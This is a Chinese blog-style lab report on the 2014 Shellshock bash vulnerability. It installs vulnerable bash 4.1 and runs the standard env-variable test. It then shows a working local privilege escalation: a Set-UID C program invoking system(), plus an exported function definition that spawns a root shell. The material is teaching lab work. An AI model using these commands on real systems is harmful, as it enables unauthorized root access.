Linux 《ShellShock 攻击实验》实验报告

最新推荐文章于 2024-04-26 16:31:32 发布
最新推荐文章于 2024-04-26 16:31:32 发布
阅读量180 收藏
点赞数
文章标签: linux bash 运维 服务器 开发语言
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/qq_35505543/article/details/128479781
版权
image.png

介绍

wiki: Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

环境搭建

  • 下载
$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

使用非 root 用户登录,这里使用 ubuntu 用户,然后切到 root 权限安装4.1版 bash。

  • 解压并进入目录
$ tar xf bash-4.1.tar.gz && cd bash-4.1
  • 配置
$ ./configure
  • 构建
$ make && make test
  • 安装
$ make install
  • 删除旧 bash 软连接
$ rm /bin/bash
  • 创建新 bash 软连接
$ ln -s /usr/local/bin/bash /bin/bash

删除原来的 bash 软连接,并创建新的软连接,到目前为止,环境已经搭建完成。

测试

  • 退出 root 用户
$ exit
  • 检测是否存在 shellshock 漏洞
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

如果输出 vulnerable,说明 bash 有漏洞。

shellshock漏洞说明

简单了解下 bash 自定义函数,只需要函数名就能够调用该函数。

  • bash 自定义函数
$ export foo='() { :; }; echo Hello World'
$ bash
$ Hello World
  • bash 对应的环境变量
KEY = foo
VALUE = () { :; }; echo Hello World

bash 读取了环境变量,在定义 foo 之后直接调用了后面的函数。一旦调用 bash,自定义的语句就直接触发。

重现shellshock攻击

通过攻击 Set-UID 程序来获得 root 权限。

  • 创建软连接,让 /bin/sh 指向 /bin/bash
$ sudo ln -sf /bin/bash /bin/sh
  • 创建 /home/ubuntu/shock.c,内容如下
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
void main()
{
    setuid(geteuid()); // 设置real uid等于effective uid
    system("/bin/ls -l");
}
  • 切换 root 用户编译 shock.c
$ sudo su && gcc -o shock shock.c
  • 设置编译后的 shock 所有者为 root
$ chmod u+s shock

hack 过程

  • 切换 ubuntu 用户
$ exit
  • 执行 shock
$ export foo='() { :; }; bash'
$ ./shock
$ root@VM-2-14-ubuntu:/home/ubuntu

成功拿到 root 用户权限。

Yohann丶blog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如何确定我的Mac或Linux是否容易受到Shellshock攻击-.docx
09-27
如何确定我的Mac或Linux是否容易受到Shellshock攻击-.docx
程序员必备的20个软件
个人博客
01-23 7319
文章目录360压缩1PasswordAdGuardAnacondaDev-C++EverythingFirefoxf.luxFoxmailGitGitHub DesktopHoneyviewJetBrains 全家桶:JetBrains ToolboxMiKTeX 我自己基本上每半年左右就要重装一次系统,所以我在这么多次的重装系统的过程中总结了如下这些在安装好Windows系统后必备的软件。 36...
[计算机网络安全实验] TCP协议漏洞利用
LostUnravel的博客
11-12 3294
用户机IP: 172.17.0.2目标机(服务器)IP: 172.17.0.3攻击机IP: 172.17.0.1。
ShellShock(破壳漏洞)的简单分析
热门推荐
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞的原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞。
Linux Shell Shock漏洞利用和实战
单核CPU的小朋友的博客
03-01 5087
漏洞介绍: Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科 漏洞实验环境搭建: 1、 以root权限安装4.1版本的bansh。下载...
SEED实验系列:ShellShock 攻击实验
weixin_33897722的博客
04-21 645
2019独角兽企业重金招聘Python工程师标准>>> ...
利用Kali进行DDOS泛洪演练
worwick的博客
08-21 5519
利用Kali自带Hping3进行DDOS泛洪攻防演练
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 948
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
环境变量相关的shellshock攻击
qq_43674956的博客
01-12 511
环境变量 什么是环境变量 环境变量是存储在进程中的一系列动态键值对,它们可以影响进程的行为。 可以通过局部变量envp获取,只能在main函数中使用 也可以用environ全局变量获取 也可以调用getenv(var_name)来获取 这个函数是在environ数组中搜索 也可以使用putenv(),setenv()和unsetenv()来改变修改和删除环境变量 进程获取环境变量的方式 使用fork()子进程继承父进程的所有环境变量 使用execve()第一个参数是新程序的路径 第二个参数是数组传入新程序的
Shellshock
A的博客
07-28 1062
实验文件夹路径下执行下面命令,耐心等待,启动被攻击的网页程序。如果想关闭程序,在实验文件夹路径下执行下面命令。打开插件HTTPHeaderLive。不能,payload经过url编码也不行。,在VisualBox中创建虚拟机。-A修改User-Agent。让CGI使用有补丁的shell攻击者用nc监听9090端口。执行失败,需要重复执行尝试。-A和-e可以进行数据注入。-e修改referer。执行下面命令找自己的ip。执行下面命令找服务器ip。然后修改成下面这个样子。的环境变量是可攻击的。......
shocker:查找和利用易受Shellshock攻击服务器的工具
05-13
查找和利用易受Shellshock攻击服务器的工具 参考: : 由NCC Group Plc作为开源发布-https: 由开发: 汤姆·沃森(Tom Watson),汤姆[点]沃森[at] nccgroup [点]信任 根据AGPL发布,请参阅许可以获取更多...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
sipshock, 用于SIP代理的扫描程序易受Shellshock攻击.zip
09-18
sipshock, 用于SIP代理的扫描程序易受Shellshock攻击 用于SIP代理的扫描程序易受Shellshock攻击用法:sipshock [ Flags ] [ IP Addresses ]用户定义的用法标志:lhost: 本地监听地址lport: 本地侦听端口( 默认 10111...
Lab-03--Shellshock.zip
12-22
包括SEED实验Lab-03--Shellshock实验指导书和报告。
Linux多进程(五) 进程池 C++实现
最新发布
Lyajpunov的博客
04-26 578
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1049
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
linux18:进程等待
m0_73919066的博客
04-20 1097
1:子进程创建的目的是要完成父进程指派的某个任务,当子进程运行完毕退出时,父进程需要通过进程等待的方式,回收子进程资源,获取子进程退出信息(子进程有无异常?没有异常结果是否正确?检查退出码查看错误原因)2:父进程如果一直不回收,就可能造成子进程‘僵尸进程’的问题,子进程一直得不到父进程的回收,进而造成内存泄漏。3:子进程一旦变成僵尸状态,那就刀枪不入,“杀人不眨眼”的kill -9 也无能为力杀死一个已经死去的进程。只能通过进程等待将他进行回收。
Linux之C编程入门
qwertf123的博客
04-21 846
Linux之C编程入门
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
jianjian的博客
04-23 931
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值